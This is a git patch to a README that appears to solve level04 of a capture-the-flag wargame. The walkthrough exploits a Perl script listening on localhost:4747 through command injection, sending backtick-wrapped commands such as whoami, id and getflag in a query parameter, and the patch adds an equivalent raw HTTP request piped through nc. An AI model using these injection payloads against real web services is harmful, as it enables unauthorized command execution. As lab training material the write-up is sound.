From 59a145806b4fe99f9aa8ac33931f24c702833b13 Mon Sep 17 00:00:00 2001
From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com>
Date: Tue, 19 Nov 2024 12:41:09 +0100
Subject: [PATCH] Update README.mdx

---
 level04/README.mdx | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/level04/README.mdx b/level04/README.mdx
index f6416a7..ef2351b 100644
--- a/level04/README.mdx
+++ b/level04/README.mdx
@@ -41,12 +41,13 @@ Solution
 - set the query payload and Perl will echo it 
 
 ```b
+> curl -I localhost:4747
+or
 > nc -vz localhost 4747
       ^ v: verbose
         z: scan if a port is open (a listening daemon)
 Connection to localhost 4747 port [tcp/*] succeeded!
 
-
 # eg.
 > curl localhost:4747/?x="\`/usr/bin/whoami\`" 
 > curl localhost:4747/?x="\`/usr/bin/id\`" 
@@ -55,12 +56,13 @@ Connection to localhost 4747 port [tcp/*] succeeded!
 > curl localhost:4747/?x="\`/bin/df\`" 
 
 
-# avoid typing realpath out
+# whereis or which : avoid typing realpath out
 > curl localhost:4747/?x="\`$(whereis pwd|awk '{print $2}')\`"
-or
 > curl localhost:4747/?x="\`$(which pwd)\`" 🟢 
 
 
 # solve
 > curl localhost:4747/?x="\`$(which getflag)\`"
+or
+> echo -e "GET /?x=\`$(which getflag)\` HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc localhost 4747
 ```